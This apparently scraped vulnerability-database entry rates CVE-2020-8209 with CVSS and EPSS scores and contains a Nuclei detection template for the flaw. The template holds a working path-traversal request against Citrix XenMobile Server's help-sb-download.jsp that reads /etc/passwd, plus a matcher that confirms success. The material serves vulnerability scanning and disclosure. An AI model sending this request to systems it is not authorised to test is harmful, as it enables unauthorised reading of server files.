7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.7 High
AI Score
Confidence
High
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.968 High
EPSS
Percentile
99.7%
Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.
id: CVE-2020-8209
info:
name: Citrix XenMobile Server - Local File Inclusion
author: dwisiswant0
severity: high
description: |
Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.
reference:
- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
- https://support.citrix.com/article/CTX277457
- https://nvd.nist.gov/vuln/detail/CVE-2020-8209
impact: |
An attacker can access sensitive information stored on the server, potentially leading to further compromise or unauthorized access.
remediation: |
Apply the latest security patches or updates provided by Citrix to fix the vulnerability.
reference:
- https://support.citrix.com/article/CTX277457
- https://github.com/Miraitowa70/POC-Notes
- https://github.com/dudek-marcin/Poc-Exp
- https://github.com/hectorgie/PoC-in-GitHub
- https://github.com/pen4uin/vulnerability-research
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-8209
cwe-id: CWE-22
epss-score: 0.96834
epss-percentile: 0.9967
cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: citrix
product: xenmobile_server
tags: cve2020,cve,citrix,lfi,xenmobile
http:
- method: GET
path:
- "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "fileDownload=true"
- "application/octet-stream"
- "attachment;"
condition: and
- type: regex
part: body
regex:
- "root:.*:0:0:"
# digest: 4a0a0047304502207857cb1944dd9e2083f4df982605d1dbcef6f8390d03106a23e982a29aed788f022100c410e96420e23c27071667a13d2d97f7f3f3676beb53a025e0ef3db9a599c5c0:922c64590222798bb761d5b6d8e72950
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.7 High
AI Score
Confidence
High
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.968 High
EPSS
Percentile
99.7%